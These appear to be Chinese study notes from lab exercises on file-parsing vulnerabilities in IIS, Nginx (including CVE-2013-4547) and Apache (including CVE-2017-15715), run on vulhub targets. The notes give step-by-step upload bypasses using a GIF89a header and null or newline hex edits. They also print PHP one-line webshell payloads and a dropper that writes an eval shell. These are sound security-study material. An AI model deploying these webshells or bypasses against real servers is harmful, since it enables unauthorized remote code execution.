IIS
1.IIS6.X
1.使用Windows2003虚拟机,在其中安装IIS6.X
2.在IIS6.X中,.asp文件夹中的文件都会被当作asp文件去执行
我们在网站根目录创建一个x.asp文件
在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码。
在外部浏览器中访问windows2003的iis网站中的2.jpg 发现asp代码被执行
2.IIS7.X
1.php.ini⾥的cgi.fix_pathinfo=1 开启,把前面的分号去掉就算开启了
2.IIS7在Fast-CGI运⾏模式下
3.将PHP⼀句话木马写到1.php并更改后缀为1.jpg上传到⽬标站点...利⽤解析漏洞进行访问
4.蚁剑连接
Nginx
1.nginx_parsing
1.在kali中开启vluhub靶场
在vluhub中找到Nginx中的靶场,运行docker-compose文件就是开启靶场
docker-compose up -d
2.运行docker-compose ps -a查看进程
3.访问
4.制作图片马进行上传,并获取木马地址
GIF89a是图片标识,如果不加会导致网站不认可我们的jpg文件
注意:cmd要加上引号
5.访问我们的图片马
访问不到我们的一句话木马,那么我们就要在目录后面加上.php让网站将我们的文件进行php解析
6.蚁剑连接
2.CVE-2013-4547
1.开启环境,同上
2.访问靶机
3.上传文件shell.php,抓包,将php改为jpg并在jpg后面加上两个空格和.php
4.在Hex中将第二个空格改为00
5.放行,上传成功
6.访问这个shell.jpg并进行抓包,将get后面参数加上两个空格,和.php
7.在hex中依旧将第二个空格改为00
Apache
1.apache_parsing
1.开启靶机
2.访问靶机并上传 shell.php.jpg 文件,文件内容为GIF89a
<?php fputs(fopen("shw.php","w"),"<?php eval(\$_POST['cmd']);?>")?>
3.蚁剑连接
2.CVE-2017-15715
1。开启靶机
2.访问靶机并上传 shell.jpg 文件,文件内容为GIF89a
<?php @eval($_POST['cmd']);?>,filename为1.php
3.抓包,在php后面加上空格,并把hex中的空格改为0a
4.放行访问1.php%0A
5,蚁剑连接